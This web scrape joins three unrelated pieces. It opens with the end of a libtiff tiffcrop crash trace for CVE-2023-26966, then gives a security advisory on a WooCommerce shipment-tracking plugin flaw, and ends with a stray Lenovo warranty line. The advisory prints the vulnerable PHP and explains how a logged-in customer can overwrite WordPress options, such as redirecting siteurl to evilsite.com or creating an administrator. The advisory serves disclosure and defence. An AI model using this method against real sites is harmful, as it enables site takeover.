        #7 0x563fd688022e in writeCroppedImage /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:9197
        #8 0x563fd685f4d5 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/tiffcrop.c:2834
        #9 0x7f1c75a96082 in __libc_start_main ../csu/libc-start.c:308
        #10 0x563fd6855b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/tools/.libs/tiffcrop+0x9b6d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tif_luv.c:961 in uv_encode
    ==1381705==ABORTING

**poc**

poc

CVE-2023-26966: SEGV at /libtiff/tif_luv.c:961 in uv_encode() (#530) · Issues · libtiff / libtiff · GitLab

The function update_shipment_status_email_status_fun in the plugin Advanced Shipment Tracking for WooCommerce in versions up to 3.2.6 is vulnerable to authenticated arbitrary options update. The function allows attackers (including those at customer level) to update any WordPress option in the database. Version 3.2.5 was initially released as a fix, but doesn't fully address the issue.

The WordPress Advanced Shipment Tracking for WooCommerce plugin (50,000+ active installations) fixed a critical vulnerability affection version 3.2.4.1 and below and, to some extend, version 3.2.6 (see Timeline below for more details).

**Authenticated WordPress Options Change**

CVSS v3.1: 9.9 (critical)

In the init method of the “woo-advanced-shipment-tracking/includes/class-wc-advanced-shipment-tracking-trackship.php” script, the plugin registers several AJAX actions when the WooCommerce shop is connected to TrackShip ($wc_ast_api_key):

 61   public function init() {   
 62
 63   add\_action( 'admin\_enqueue\_scripts', array( $this, 'trackship\_styles' ), 4 );      
 64
 65   $wc\_ast\_api\_key = get\_option( 'wc\_ast\_api\_key' ); 
 66   if ( $wc\_ast\_api\_key ) {
         ...
         ...
129      add\_action( 'wp\_ajax\_update\_shipment\_status\_email\_status', array( $this, 'update\_shipment\_status\_email\_status\_fun' ) );
130
131      add\_action( 'wp\_ajax\_update\_enable\_late\_shipments\_email', array( $this, 'update\_enable\_late\_shipments\_email\_fun' ) );
         ...
         ...
147      }
148   }

The update_shipment_status_email_status action loads the update_shipment_status_email_status_fun function, located line 1053:

/\*
\* update all shipment status email status
\*/
public function update\_shipment\_status\_email\_status\_fun() {	
   $status\_settings = get\_option( $\_POST\['settings\_data'\] ); 
   $status\_settings\[ $\_POST\['id'\] \] = wc\_clean( $\_POST\[ 'wcast\_enable\_status\_email' \] );
   update\_option( $\_POST\['settings\_data'\], $status\_settings );		
   exit;
}

The function is used to save options to the WordPress options table in the database. It doesn’t validate inputs and as it lacks a capability check and a security nonce, it is accessible to all authenticated users and WooCommerce customers.

Because the function uses an array, $status_settings, it may look like only options stored as an array in the database could be modified. However, in PHP, each character within a string can be accessed and modified by specifying its zero-based offset similarly to an array of characters:

$string = '';
$string\[0\] = 'f';
$string\[1\] = 'o';
$string\[2\] = 'o';

is equivalent to:

$string = 'foo';

Therefore, any array (and integer) data in the WordPress options table can also be altered using such a trick. In the example below I redirected all traffic by changing the siteurl from “https://example.com” to “https://evilsite.com” without too much hassle:

MariaDB \[example\]> SELECT \* FROM \`wp\_options\` LIMIT 5;
+-----------+--------------------+-----------------------------+----------+
| option\_id | option\_name        | option\_value                | autoload |
+-----------+--------------------+-----------------------------+----------+
|         1 | siteurl            | https://evilsite.com        | yes      |
|         2 | home               | https://example.com         | yes      |
|         3 | blogname           | WP Example                  | yes      |
|         4 | blogdescription    | Just another WordPress site | yes      |
|         5 | users\_can\_register | 0                           | yes      |
+-----------+--------------------+-----------------------------+----------+
5 rows in set (0.001 sec)

Any authenticated users, including WooCommerce customers, can use that AJAX action to modify WordPress options in the database, for instance:

*   Redirect all traffic to an external malicious website (siteurl).
*   Create an administrator account by enabling registration (users_can_register) and setting the default role to “administrator” (default_role).
*   Change the administrator email address (admin_email).
*   Activate/deactivate plugins (active_plugins).
*   Etc.

Another AJAX action, update_enable_late_shipments_email, loads the update_enable_late_shipments_email_fun function located line 1063:

/\*
\* update late shipment email status
\*/
public function update\_enable\_late\_shipments\_email\_fun() {		
   $status\_settings\[ $\_POST\['id'\] \] = wc\_clean( $\_POST\[ 'wcast\_enable\_late\_shipments\_email' \] );
   update\_option( $\_POST\['settings\_data'\], $status\_settings );			
   exit;
}

Although it is prone to the same vulnerability, this function has a bug: $status_settings isn’t initialized before being used L1064, hence it could be exploited too but only to modify an array of options in the database.

**Additional Issues**

Several functions in the plugin were accessible to any logged-in users.

**Recommendations**

Update immediately if you have version 3.2.6 or below installed. If you are using our web application firewall for WordPress, NinjaFirewall WP Edition (free) and NinjaFirewall WP+ Edition (premium), you are protected against this vulnerability.  

**Timeline**

The vulnerability was reported to the authors on June 23, 2021, and a new version 3.2.5 was released on June 25, 2021. However, as the new version relied on security nonces only, we contacted the developers on June 28 to warn that, despite temporarily solving the problem, nonces could be compromised and thus shouldn’t be used as a substitute for capability checks to protect functions. Version 3.2.6 and 3.2.7 were released on July 22 and 23, 2021.

**Stay informed about the latest vulnerabilities**

*   Running WordPress? You can get email notifications about vulnerabilities in the plugins or themes installed on your blog.
*   On Twitter: @nintechnet

Search

lenovo warranty check/lookup | check warranty status | lenovo support us